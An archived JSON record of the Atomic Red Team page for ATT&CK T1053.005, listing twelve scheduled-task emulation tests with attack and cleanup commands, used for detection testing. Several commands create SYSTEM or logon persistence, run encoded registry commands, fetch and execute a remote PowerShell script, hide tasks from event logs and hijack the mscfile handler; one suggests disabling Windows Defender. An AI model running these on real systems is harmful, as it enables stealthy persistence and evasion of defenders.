{
	"id": "ca9bed6e-b976-4bef-822c-de3079bde743",
	"created_at": "2026-04-06T01:31:02.607308Z",
	"updated_at": "2026-04-10T03:20:36.973663Z",
	"deleted_at": null,
	"sha1_hash": "effff03e25ec84a32d101541baba5e9afc1c6cde",
	"title": "atomic-red-team/atomics/T1053.005/T1053.005.md at master · redcanaryco/atomic-red-team",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 119646,
	"plain_text": "atomic-red-team/atomics/T1053.005/T1053.005.md at master ·\r\nredcanaryco/atomic-red-team\r\nBy Atomic Red Team doc generator\r\nArchived: 2026-04-06 00:23:08 UTC\r\nT1053.005 - Scheduled Task/Job: Scheduled Task\r\nDescription from ATT\u0026CK\r\nAdversaries may abuse the Windows Task Scheduler to perform task scheduling for initial or recurring execution\r\nof malicious code. There are multiple ways to access the Task Scheduler in Windows. The schtasks utility can be\r\nrun directly on the command line, or the Task Scheduler can be opened through the GUI within the Administrator\r\nTools section of the Control Panel.(Citation: Stack Overflow) In some cases, adversaries have used a .NET\r\nwrapper for the Windows Task Scheduler, and alternatively, adversaries have used the Windows netapi32 library\r\nand Windows Management Instrumentation (WMI) to create a scheduled task. Adversaries may also utilize the\r\nPowershell Cmdlet Invoke-CimMethod , which leverages WMI class PS_ScheduledTask to create a scheduled\r\ntask via an XML path.(Citation: Red Canary - Atomic Red Team)\r\nAn adversary may use Windows Task Scheduler to execute programs at system startup or on a scheduled basis for\r\npersistence. The Windows Task Scheduler can also be abused to conduct remote Execution as part of Lateral\r\nMovement and/or to run a process under the context of a specified account (such as SYSTEM). Similar to\r\nSystem Binary Proxy Execution, adversaries have also abused the Windows Task Scheduler to potentially mask\r\none-time execution under signed/trusted system processes.(Citation: ProofPoint Serpent)\r\nAdversaries may also create \"hidden\" scheduled tasks (i.e. Hide Artifacts) that may not be visible to defender\r\ntools and manual queries used to enumerate tasks. 
Specifically, an adversary may hide a task from schtasks\r\n/query and the Task Scheduler by deleting the associated Security Descriptor (SD) registry value (where\r\ndeletion of this value must be completed using SYSTEM permissions).(Citation: SigmaHQ)(Citation: Tarrask\r\nscheduled task) Adversaries may also employ alternate methods to hide tasks, such as altering the metadata (e.g.,\r\nIndex value) within associated registry keys.(Citation: Defending Against Scheduled Task Attacks in Windows\r\nEnvironments)\r\nSource\r\nAtomic Tests\r\nAtomic Test #1: Scheduled Task Startup Script\r\nAtomic Test #2: Scheduled task Local\r\nAtomic Test #3: Scheduled task Remote\r\nAtomic Test #4: Powershell Cmdlet Scheduled Task\r\nAtomic Test #5: Task Scheduler via VBA\r\nAtomic Test #6: WMI Invoke-CimMethod Scheduled Task\r\nAtomic Test #7: Scheduled Task Executing Base64 Encoded Commands From Registry\r\nAtomic Test #8: Import XML Schedule Task with Hidden Attribute\r\nAtomic Test #9: PowerShell Modify A Scheduled Task\r\nAtomic Test #10: Scheduled Task (\"Ghost Task\") via Registry Key Manipulation\r\nAtomic Test #11: Scheduled Task Persistence via CompMgmt.msc\r\nAtomic Test #12: Scheduled Task Persistence via Eventviewer.msc\r\nAtomic Test #1: Scheduled Task Startup Script\r\nRun an exe on user logon or system startup. Upon execution, success messages will be displayed for the two scheduled\r\ntasks. To view the tasks, open the Task Scheduler and look in the Active Tasks pane.\r\nSupported Platforms: Windows\r\nauto_generated_guid: fec27f65-db86-4c2d-b66c-61945aee87c2\r\nAttack Commands: Run with command_prompt ! Elevation Required (e.g. root or admin)\r\nschtasks /create /tn \"T1053_005_OnLogon\" /sc onlogon /tr \"cmd.exe /c calc.exe\"\r\nschtasks /create /tn \"T1053_005_OnStartup\" /sc onstart /ru system /tr \"cmd.exe /c calc.exe\"\r\nCleanup Commands\r\nschtasks /delete /tn \"T1053_005_OnLogon\" /f \u003enul 2\u003e\u00261\r\nschtasks /delete /tn \"T1053_005_OnStartup\" /f \u003enul 2\u003e\u00261\r\nAtomic Test #2: Scheduled task Local\r\nUpon successful execution, cmd.exe will create a scheduled task to spawn cmd.exe at 20:10.\r\nSupported Platforms: Windows\r\nauto_generated_guid: 42f53695-ad4a-4546-abb6-7d837f644a71\r\nInputs\r\nName | Description | Type | Default Value\r\ntask_command | What you want to execute | string | C:\\windows\\system32\\cmd.exe\r\ntime | What time 24 Hour | string | 20:10\r\nAttack Commands: Run with command_prompt !\r\nSCHTASKS /Create /SC ONCE /TN spawn /TR #{task_command} /ST #{time}\r\nCleanup Commands\r\nSCHTASKS /Delete /TN spawn /F \u003enul 2\u003e\u00261\r\nAtomic Test #3: Scheduled task Remote\r\nCreate a task on a remote system. Upon successful execution, cmd.exe will create a scheduled task to spawn cmd.exe at\r\n20:10 on a remote endpoint.\r\nSupported Platforms: Windows\r\nauto_generated_guid: 2e5eac3e-327b-4a88-a0c0-c4057039a8dd\r\nInputs\r\nName | Description | Type | Default Value\r\ntask_command | What you want to execute | string | C:\\windows\\system32\\cmd.exe\r\ntime | What time 24 Hour | string | 20:10\r\ntarget | Target | string | localhost\r\nuser_name | Username to authenticate with, format: DOMAIN\\User | string | DOMAIN\\user\r\npassword | Password to authenticate with | string | At0micStrong\r\nAttack Commands: Run with command_prompt ! Elevation Required (e.g. root or admin)\r\nSCHTASKS /Create /S #{target} /RU #{user_name} /RP #{password} /TN \"Atomic task\" /TR \"#{task_command}\" /SC da\r\nCleanup Commands\r\nSCHTASKS /Delete /S #{target} /U #{user_name} /P #{password} /TN \"Atomic task\" /F \u003enul 2\u003e\u00261\r\nAtomic Test #4: Powershell Cmdlet Scheduled Task\r\nCreate an atomic scheduled task that leverages native PowerShell cmdlets.\r\nUpon successful execution, powershell.exe will create a scheduled task to spawn cmd.exe at 20:10.\r\nSupported Platforms: Windows\r\nauto_generated_guid: af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd\r\nAttack Commands: Run with powershell !\r\n$Action = New-ScheduledTaskAction -Execute \"calc.exe\"\r\n$Trigger = New-ScheduledTaskTrigger -AtLogon\r\n$User = New-ScheduledTaskPrincipal -GroupId \"BUILTIN\\Administrators\" -RunLevel Highest\r\n$Set = New-ScheduledTaskSettingsSet\r\n$object = New-ScheduledTask -Action $Action -Principal $User -Trigger $Trigger -Settings $Set\r\nRegister-ScheduledTask AtomicTask -InputObject $object\r\nCleanup Commands\r\nUnregister-ScheduledTask -TaskName \"AtomicTask\" -confirm:$false \u003e$null 2\u003e\u00261\r\nAtomic Test #5: Task Scheduler via VBA\r\nThis module utilizes the Windows API to schedule a task for code execution (notepad.exe). The task scheduler will execute\r\n\"notepad.exe\" within 30 - 40 seconds after this module has run.\r\nSupported Platforms: Windows\r\nauto_generated_guid: ecd3fa21-7792-41a2-8726-2c5c673414d3\r\nInputs\r\nName | Description | Type | Default Value\r\nms_product | Maldoc application Word | string | Word\r\nAttack Commands: Run with powershell !\r\n[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\r\nIEX (iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-M\r\nInvoke-MalDoc -macroFile \"PathToAtomicsFolder\\T1053.005\\src\\T1053.005-macrocode.txt\" -officeProduct \"#{ms_pro\r\nCleanup Commands\r\nUnregister-ScheduledTask -TaskName \"Run Notepad\" -Confirm:$false\r\nDependencies: Run with powershell !\r\nDescription: Microsoft #{ms_product} must be installed\r\nCheck Prereq Commands\r\ntry {\r\n New-Object -COMObject \"#{ms_product}.Application\" | Out-Null\r\n $process = \"#{ms_product}\"; if ( $process -eq \"Word\") {$process = \"winword\"}\r\n Stop-Process -Name $process\r\n exit 0\r\n} catch { exit 1 }\r\nGet Prereq Commands\r\nWrite-Host \"You will need to install Microsoft #{ms_product} manually to meet this requirement\"\r\nAtomic Test #6: WMI Invoke-CimMethod Scheduled Task\r\nCreate a scheduled task that executes notepad.exe after user login from XML by leveraging WMI class\r\nPS_ScheduledTask. This does the same thing as the Register-ScheduledTask cmdlet behind the scenes.\r\nSupported Platforms: Windows\r\nauto_generated_guid: e16b3b75-dc9e-4cde-a23d-dfa2d0507b3b\r\nInputs\r\nName | Description | Type | Default Value\r\nxml_path | path of vbs to use when creating masquerading files | path | PathToAtomicsFolder\\T1053.005\\src\\T1053_005_WMI.xml\r\nAttack Commands: Run with powershell ! Elevation Required (e.g. root or admin)\r\n$xml = [System.IO.File]::ReadAllText(\"#{xml_path}\")\r\nInvoke-CimMethod -ClassName PS_ScheduledTask -NameSpace \"Root\\Microsoft\\Windows\\TaskScheduler\" -MethodName \"R\r\nCleanup Commands\r\nUnregister-ScheduledTask -TaskName \"T1053_005_WMI\" -confirm:$false \u003e$null 2\u003e\u00261\r\nDependencies: Run with powershell !\r\nDescription: File to copy must exist on disk at specified location (#{xml_path})\r\nCheck Prereq Commands\r\nif (Test-Path \"#{xml_path}\") {exit 0} else {exit 1}\r\nGet Prereq Commands\r\nNew-Item -Type Directory (split-path \"#{xml_path}\") -ErrorAction ignore | Out-Null\r\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1053.005/src/T1053_005_\r\nAtomic Test #7: Scheduled Task Executing Base64 Encoded Commands From Registry\r\nA Base64 Encoded command will be stored in the registry (ping 127.0.0.1) and then a scheduled task will be created. The\r\nscheduled task will launch powershell to decode and run the command in the registry daily. This is a persistence mechanism\r\nrecently seen in use by Qakbot.\r\nAdditional Information\r\nSupported Platforms: Windows\r\nauto_generated_guid: e895677d-4f06-49ab-91b6-ae3742d0a2ba\r\nInputs\r\nName | Description | Type | Default Value\r\ntime | Daily scheduled task execution time | string | 07:45\r\nAttack Commands: Run with command_prompt !\r\nreg add HKCU\\SOFTWARE\\ATOMIC-T1053.005 /v test /t REG_SZ /d cGluZyAxMjcuMC4wLjE= /f\r\nschtasks.exe /Create /F /TN \"ATOMIC-T1053.005\" /TR \"cmd /c start /min \\\"\\\" powershell.exe -Command IEX([Syste\r\nCleanup Commands\r\nschtasks /delete /tn \"ATOMIC-T1053.005\" /F \u003enul 2\u003e\u00261\r\nreg delete HKCU\\SOFTWARE\\ATOMIC-T1053.005 /F \u003enul 2\u003e\u00261\r\nAtomic Test #8: Import XML Schedule Task with Hidden Attribute\r\nCreate a scheduled task that executes calc.exe after user login from XML that contains the hidden setting attribute. This\r\ntechnique was seen several times in TrickBot malware and also in the targeted attack campaign Industroyer2.\r\nSupported Platforms: Windows\r\nauto_generated_guid: cd925593-fbb4-486d-8def-16cbdf944bf4\r\nInputs\r\nName | Description | Type | Default Value\r\nxml_path | path of vbs to use when creating masquerading files | path | PathToAtomicsFolder\\T1053.005\\src\\T1053_05_SCTASK_HIDDEN_ATTRIB.xml\r\nAttack Commands: Run with powershell ! Elevation Required (e.g. root or admin)\r\n$xml = [System.IO.File]::ReadAllText(\"#{xml_path}\")\r\nInvoke-CimMethod -ClassName PS_ScheduledTask -NameSpace \"Root\\Microsoft\\Windows\\TaskScheduler\" -MethodName \"R\r\nCleanup Commands\r\nUnregister-ScheduledTask -TaskName \"atomic red team\" -confirm:$false \u003e$null 2\u003e\u00261\r\nDependencies: Run with powershell !\r\nDescription: File to copy must exist on disk at specified location (#{xml_path})\r\nCheck Prereq Commands\r\nif (Test-Path \"#{xml_path}\") {exit 0} else {exit 1}\r\nGet Prereq Commands\r\nNew-Item -Type Directory (split-path \"#{xml_path}\") -ErrorAction ignore | Out-Null\r\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1053.005/src/T1053_05_S\r\nAtomic Test #9: PowerShell Modify A Scheduled Task\r\nCreate a scheduled task with an action and modify the action to do something else. The initial idea is to showcase Microsoft\r\nWindows TaskScheduler Operational log modification of an action on a Task already registered. It will first be created to\r\nspawn cmd.exe, but modified to run notepad.exe.\r\nUpon successful execution, powershell.exe will create a scheduled task and modify the action.\r\nSupported Platforms: Windows\r\nauto_generated_guid: dda6fc7b-c9a6-4c18-b98d-95ec6542af6d\r\nAttack Commands: Run with powershell !\r\n$Action = New-ScheduledTaskAction -Execute \"cmd.exe\"\r\n$Trigger = New-ScheduledTaskTrigger -AtLogon\r\n$User = New-ScheduledTaskPrincipal -GroupId \"BUILTIN\\Administrators\" -RunLevel Highest\r\n$Set = New-ScheduledTaskSettingsSet\r\n$object = New-ScheduledTask -Action $Action -Principal $User -Trigger $Trigger -Settings $Set\r\nRegister-ScheduledTask AtomicTaskModifed -InputObject $object\r\n$NewAction = New-ScheduledTaskAction -Execute \"Notepad.exe\"\r\nSet-ScheduledTask \"AtomicTaskModifed\" -Action $NewAction\r\nCleanup Commands\r\nUnregister-ScheduledTask -TaskName \"AtomicTaskModifed\" -confirm:$false \u003e$null 2\u003e\u00261\r\nAtomic Test #10: Scheduled Task (\"Ghost Task\") via Registry Key Manipulation\r\nCreate a scheduled task through manipulation of registry keys. This procedure is implemented using the GhostTask utility.\r\nBy manipulating registry keys under HKLM\\SOFTWARE\\Microsoft\\Windows\r\nNT\\CurrentVersion\\Schedule\\TaskCache\\Tree, the tool creates user-specified scheduled tasks without a corresponding\r\nWindows Event 4698, which is logged when scheduled tasks are created through conventional means. This requires a\r\ndownload of the GhostTask binary, which must be run as NT Authority\\SYSTEM. Upon successful execution of this test, a\r\nscheduled task will be set to run at logon which launches notepad.exe or runs a user-specified command. For further\r\nexploration of this procedure and guidance for hunting and detection, see Hunting G-G-G-GhostTasks!.\r\nSupported Platforms: Windows\r\nauto_generated_guid: 704333ca-cc12-4bcf-9916-101844881f54\r\nInputs\r\nName | Description | Type | Default Value\r\ntask_name | Name of the newly-added task | string | lilghostie\r\ntask_command | Command you want the task to execute | string | notepad.exe\r\ntarget | System where the task should run | string | localhost\r\nuser_name | Username to authenticate with, such as ATOMICDOMAIN\\AtomicAdmin | string | $env:USERDOMAIN + '\\' + $env:USERNAME\r\nAttack Commands: Run with command_prompt ! Elevation Required (e.g. root or admin)\r\n\"PathToAtomicsFolder\\..\\ExternalPayloads\\PsExec.exe\" \\\\#{target} -accepteula -s \"cmd.exe\"\r\n\"PathToAtomicsFolder\\..\\ExternalPayloads\\GhostTask.exe\" \\\\#{target} add #{task_name} \"cmd.exe\" \"/c #{task_com\r\nCleanup Commands\r\n\"PathToAtomicsFolder\\..\\ExternalPayloads\\PsExec.exe\" \\\\#{target} -accepteula -s \"cmd.exe\"\r\n\"PathToAtomicsFolder\\..\\ExternalPayloads\\GhostTask.exe\" \\\\#{target} delete #{task_name} \u003e nul\r\nDependencies: Run with powershell !\r\nDescription: PsExec tool from Sysinternals must exist in the ExternalPayloads directory\r\nCheck Prereq Commands\r\nif (Test-Path \"PathToAtomicsFolder\\..\\ExternalPayloads\\PsExec.exe\") { exit 0} else { exit 1}\r\nGet Prereq Commands\r\nNew-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\" -ErrorAction Ignore -Force | Out-Null\r\nInvoke-WebRequest \"https://download.sysinternals.com/files/PSTools.zip\" -OutFile \"PathToAtomicsFolder\\..\\Exte\r\nExpand-Archive \"PathToAtomicsFolder\\..\\ExternalPayloads\\PsTools.zip\" \"PathToAtomicsFolder\\..\\ExternalPayloads\r\nCopy-Item \"PathToAtomicsFolder\\..\\ExternalPayloads\\PsTools\\PsExec.exe\" \"PathToAtomicsFolder\\..\\ExternalPayloa\r\nDescription: GhostTask.exe tool from netero1010 must exist in the ExternalPayloads directory. This tool may be quarantined by Windows\r\nDefender; disable Windows Defender real-time protection to fix it or add the ExternalPayloads directory as an exclusion, using a command\r\nlike Add-MpPreference -ExclusionPath \"PathToAtomicsFolder\\..\\ExternalPayloads\\\"\r\nCheck Prereq Commands\r\nif (Test-Path \"PathToAtomicsFolder\\..\\ExternalPayloads\\GhostTask.exe\") { exit 0} else { exit 1}\r\nGet Prereq Commands\r\nNew-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\" -ErrorAction Ignore -Force | Out-Null\r\nInvoke-WebRequest \"https://github.com/netero1010/GhostTask/releases/download/1.0/GhostTask.exe\" -OutFile \"Pat\r\nAtomic Test #11: Scheduled Task Persistence via CompMgmt.msc\r\nAdds persistence by abusing compmgmt.msc via a scheduled task. When the Computer Management console is opened, it\r\nwill run a malicious payload (in this case, calc.exe). This technique abuses scheduled tasks and registry modifications to\r\nhijack legitimate system processes.\r\nSupported Platforms: Windows\r\nauto_generated_guid: 8fcfa3d5-ea7d-4e1c-bd3e-3c4ed315b7d2\r\nInputs\r\nName | Description | Type | Default Value\r\ntask_name | Name of the newly-created scheduled task | string | CompMgmtBypass\r\npayload | Command you want the task to execute | string | calc.exe\r\nAttack Commands: Run with command_prompt ! Elevation Required (e.g. root or admin)\r\nreg add \"HKEY_CURRENT_USER\\Software\\Classes\\mscfile\\shell\\open\\command\" /ve /t REG_EXPAND_SZ /d \"c:\\windows\\S\r\nschtasks /Create /TN \"#{task_name}\" /TR \"compmgmt.msc\" /SC ONLOGON /RL HIGHEST /F\r\nECHO Let's open the Computer Management console now...\r\ncompmgmt.msc\r\nCleanup Commands\r\nreg delete \"HKEY_CURRENT_USER\\Software\\Classes\\mscfile\\shell\\open\\command\" /f\r\nschtasks /Delete /TN \"#{task_name}\" /F\r\nAtomic Test #12: Scheduled Task Persistence via Eventviewer.msc\r\nAdds persistence by abusing eventviewer.msc via a scheduled task. When the eventviewer console is opened, it will run a\r\nmalicious payload (in this case, calc.exe).\r\nSupported Platforms: Windows\r\nauto_generated_guid: 02124c37-767e-4b76-9383-c9fc366d9d4c\r\nInputs\r\nName | Description | Type | Default Value\r\ntask_name | Name of the newly-created scheduled task | string | EventViewerBypass\r\npayload | Command you want the task to execute | string | calc.exe\r\nAttack Commands: Run with command_prompt ! Elevation Required (e.g. root or admin)\r\nreg add \"HKEY_CURRENT_USER\\Software\\Classes\\mscfile\\shell\\open\\command\" /ve /t REG_EXPAND_SZ /d \"c:\\windows\\S\r\nschtasks /Create /TN \"#{task_name}\" /TR \"eventvwr.msc\" /SC ONLOGON /RL HIGHEST /F\r\nECHO Let's run the schedule task ...\r\nschtasks /Run /TN \"EventViewerBypass\"\r\nCleanup Commands\r\nreg delete \"HKEY_CURRENT_USER\\Software\\Classes\\mscfile\\shell\\open\\command\" /f\r\nschtasks /Delete /TN \"#{task_name}\" /F\r\nSource: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"references": [
		"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"
	],
	"report_names": [
		"T1053.005.md"
	],
	"threat_actors": [],
	"ts_created_at": 1775439062,
	"ts_updated_at": 1775791236,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/effff03e25ec84a32d101541baba5e9afc1c6cde.pdf",
		"text": "https://archive.orkl.eu/effff03e25ec84a32d101541baba5e9afc1c6cde.txt",
		"img": "https://archive.orkl.eu/effff03e25ec84a32d101541baba5e9afc1c6cde.jpg"
	}
}